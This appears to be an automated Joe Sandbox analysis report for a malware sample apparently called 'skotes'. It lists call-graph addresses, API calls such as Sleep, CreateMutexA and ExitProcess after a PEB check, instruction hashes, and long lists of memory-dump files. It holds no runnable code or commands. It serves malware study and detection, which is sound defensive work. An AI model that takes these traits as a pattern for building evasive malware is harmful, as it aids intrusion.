b8834d 12274->12275 12276 b88f40 RtlAllocateHeap 12274->12276 12276->12275 12280 b72b10 12281 b72b1c 12280->12281 12282 b72b1a 12280->12282 12283 b8c26a 5 API calls 12281->12283 12284 b72b22 12283->12284 12285 b88510 12286 b8855f 12285->12286 12288 b8856c 12285->12288 12291 b89d00 12286->12291 12289 b885c4 12288->12289 12312 b8a060 12288->12312 12292 b89e31 12291->12292 12296 b89d25 12291->12296 12293 b89270 RtlAllocateHeap 12292->12293 12304 b89d8b __cftof 12293->12304 12294 ba6c6a RtlAllocateHeap 12303 b89e3b 12294->12303 12295 b89e2c 12299 b72480 RtlAllocateHeap 12295->12299 12296->12295 12297 b89d7a 12296->12297 12298 b89da1 12296->12298 12297->12295 12300 b89d85 12297->12300 12302 b8d3e2 RtlAllocateHeap 12298->12302 12298->12304 12299->12292 12301 b8d3e2 RtlAllocateHeap 12300->12301 12301->12304 12302->12304 12305 b89e6a shared_ptr 12303->12305 12306 ba6c6a RtlAllocateHeap 12303->12306 12304->12294 12307 b89dfc shared_ptr __cftof 12304->12307 12305->12288 12308 b89e8e 12306->12308 12307->12288 12309 b89ec0 shared_ptr 12308->12309 12310 ba6c6a RtlAllocateHeap 12308->12310 12309->12288 12311 b89ee6 12310->12311 12313 b8a1b1 12312->12313 12314 b8a083 12312->12314 12315 b89270 RtlAllocateHeap 12313->12315 12317 b8a1ac 12314->12317 12318 b8a0fd 12314->12318 12319 b8a0d3 12314->12319 12325 b8a0e4 __cftof 12315->12325 12316 ba6c6a RtlAllocateHeap 12324 b8a1bb shared_ptr 12316->12324 12320 b72480 RtlAllocateHeap 12317->12320 12323 b8d3e2 RtlAllocateHeap 12318->12323 12318->12325 12319->12317 12321 b8a0de 12319->12321 12320->12313 12322 b8d3e2 RtlAllocateHeap 12321->12322 12322->12325 12323->12325 12324->12288 12325->12316 12326 b8a16c shared_ptr __cftof 12325->12326 12326->12288 12327 b8d111 12328 b8d122 12327->12328 12329 b8d12a 12328->12329 12331 b8d199 12328->12331 12332 b8d1c0 12331->12332 12333 b8d1a7 SleepConditionVariableCS 12331->12333 12332->12328 12333->12332 12335 b7211c 12336 b72126 12335->12336 12337 b8d64e RtlAllocateHeap 12336->12337 12338 b72132 12337->12338 12357 b74300 12358 b7432e 12357->12358 12361 b74359 shared_ptr 12357->12361 12359 ba6c6a RtlAllocateHeap 12358->12359 12358->12361 12360 b743eb 12359->12360 12387 b75f76 12389 b75f81 shared_ptr 12387->12389 12388 b75ffe shared_ptr __floor_pentium4 12389->12388 12390 ba6c6a RtlAllocateHeap 12389->12390 12391 b7601b 12390->12391 12392 b880c0 RtlAllocateHeap 12391->12392 12393 b76089 12392->12393 12394 b880c0 RtlAllocateHeap 12393->12394 12395 b760bd 12394->12395 12396 b880c0 RtlAllocateHeap 12395->12396 12397 b760ee 12396->12397 12398 b880c0 RtlAllocateHeap 12397->12398 12399 b7611f 12398->12399 12400 b880c0 RtlAllocateHeap 12399->12400 12402 b76150 12400->12402 12401 b765b1 shared_ptr __floor_pentium4 12402->12401 12403 ba6c6a RtlAllocateHeap 12402->12403 12404 b765dc 12403->12404 12405 b87a00 RtlAllocateHeap 12404->12405 12406 b766a6 12405->12406 12407 b75c10 4 API calls 12406->12407 12408 b766ac 12407->12408 12409 b75c10 4 API calls 12408->12409 12410 b766b1 12409->12410 12411 b722c0 4 API calls 12410->12411 12412 b766c9 shared_ptr 12411->12412 12413 b87a00 RtlAllocateHeap 12412->12413 12414 b76732 12413->12414 12415 b75c10 4 API calls 12414->12415 12416 b7673d 12415->12416 12417 b722c0 4 API calls 12416->12417 12426 b76757 shared_ptr 12417->12426 12418 b76852 12419 b880c0 RtlAllocateHeap 12418->12419 12421 b7689c 12419->12421 12420 b87a00 RtlAllocateHeap 12420->12426 12422 b880c0 RtlAllocateHeap 12421->12422 12424 b768e3 shared_ptr __floor_pentium4 12422->12424 12423 b75c10 4 API calls 12423->12426 12425 b722c0 4 API calls 12425->12426 12426->12418 12426->12420 12426->12423 12426->12425 12427 b72170 12432 b8c6fc 12427->12432 12430 b8d64e RtlAllocateHeap 12431 b72184 12430->12431 12433 b8c70c 12432->12433 12434 b7217a 12432->12434 12433->12434 12436 b8cfbe 12433->12436 12434->12430 12437 b8ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12436->12437 12438 b8cfd0 12437->12438 12438->12433 12439 b73970 12440 b8c68b __Mtx_init_in_situ 2 API calls 12439->12440 12441 b739a7 12440->12441 12442 b8c68b __Mtx_init_in_situ 2 API calls 12441->12442 12443 b739e6 12442->12443 12444 b73770 12445 b7379b 12444->12445 12446 b737cd shared_ptr 12445->12446 12447 ba6c6a RtlAllocateHeap 12445->12447 12448 b7380f 12447->12448 12492 b7215a 12493 b8c6fc InitializeCriticalSectionEx 12492->12493 12494 b72164 12493->12494 12495 b8d64e RtlAllocateHeap 12494->12495 12496 b7216e 12495->12496 12497 b79f44 12498 b79f4c shared_ptr 12497->12498 12499 b7a92b 12498->12499 12500 b7a01f shared_ptr 12498->12500 12501 b7a953 Sleep CreateMutexA 12499->12501 12502 ba6c6a RtlAllocateHeap 12499->12502 12504 b880c0 RtlAllocateHeap 12500->12504 12503 b7a98e 12501->12503 12502->12501 12505 b7a903 12504->12505 12558 b7a54d 12559 b7a555 shared_ptr 12558->12559 12560 b7a628 shared_ptr 12559->12560 12561 b7a944 12559->12561 12564 b880c0 RtlAllocateHeap 12560->12564 12562 ba6c6a RtlAllocateHeap 12561->12562 12563 b7a949 12562->12563 12565 ba6c6a RtlAllocateHeap 12563->12565 12566 b7a903 12564->12566 12567 b7a94e 12565->12567 12568 ba6c6a RtlAllocateHeap 12567->12568 12569 b7a953 Sleep CreateMutexA 12568->12569 12570 b7a98e 12569->12570

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 367 ba652b-ba6538 call baa302 370 ba655a-ba656c call ba656d ExitProcess 367->370 371 ba653a-ba6548 GetPEB 367->371 371->370 372 ba654a-ba6559 371->372 372->370
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,00BA652A,?,?,?,?,?,00BA7661), ref: 00BA6567
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                          • Opcode ID: c70ca35fdc6f79228b47b9ddceaee12a834c439d12a462a4bbe0b9dd1ad921cc
                                                                                                                                                                                                                                          • Instruction ID: 13131187918effe0962daa3d01a457fcb637af22992df18fedf6f09d5c6b76de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c70ca35fdc6f79228b47b9ddceaee12a834c439d12a462a4bbe0b9dd1ad921cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20E08C3044460CAECF257F58C849D9D3BEAEB62789F184840F81846222CB35EE91DA90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: ec5a1fd3dec6fc54347a6ab7ff7b106cb914780b204b748bdc3d443943ae904a
                                                                                                                                                                                                                                          • Instruction ID: 27c22c7545dae5dcee42c4ac048b85bd1329c16800c4ffd03438021533beea4a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec5a1fd3dec6fc54347a6ab7ff7b106cb914780b204b748bdc3d443943ae904a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6313B716041049BEB08EB78DD8575DBBE2EBC6310F24C2A9E02CD73D6D7759980C752

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 22 b79f44-b79f64 26 b79f66-b79f72 22->26 27 b79f92-b79fae 22->27 28 b79f74-b79f82 26->28 29 b79f88-b79f8f call b8d663 26->29 30 b79fb0-b79fbc 27->30 31 b79fdc-b79ffb 27->31 28->29 32 b7a92b 28->32 29->27 34 b79fd2-b79fd9 call b8d663 30->34 35 b79fbe-b79fcc 30->35 36 b79ffd-b7a009 31->36 37 b7a029-b7a916 call b880c0 31->37 41 b7a953-b7a994 Sleep CreateMutexA 32->41 42 b7a92b call ba6c6a 32->42 34->31 35->32 35->34 38 b7a01f-b7a026 call b8d663 36->38 39 b7a00b-b7a019 36->39 38->37 39->32 39->38 51 b7a9a7-b7a9a8 41->51 52 b7a996-b7a998 41->52 42->41 52->51 54 b7a99a-b7a9a5 52->54 54->51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
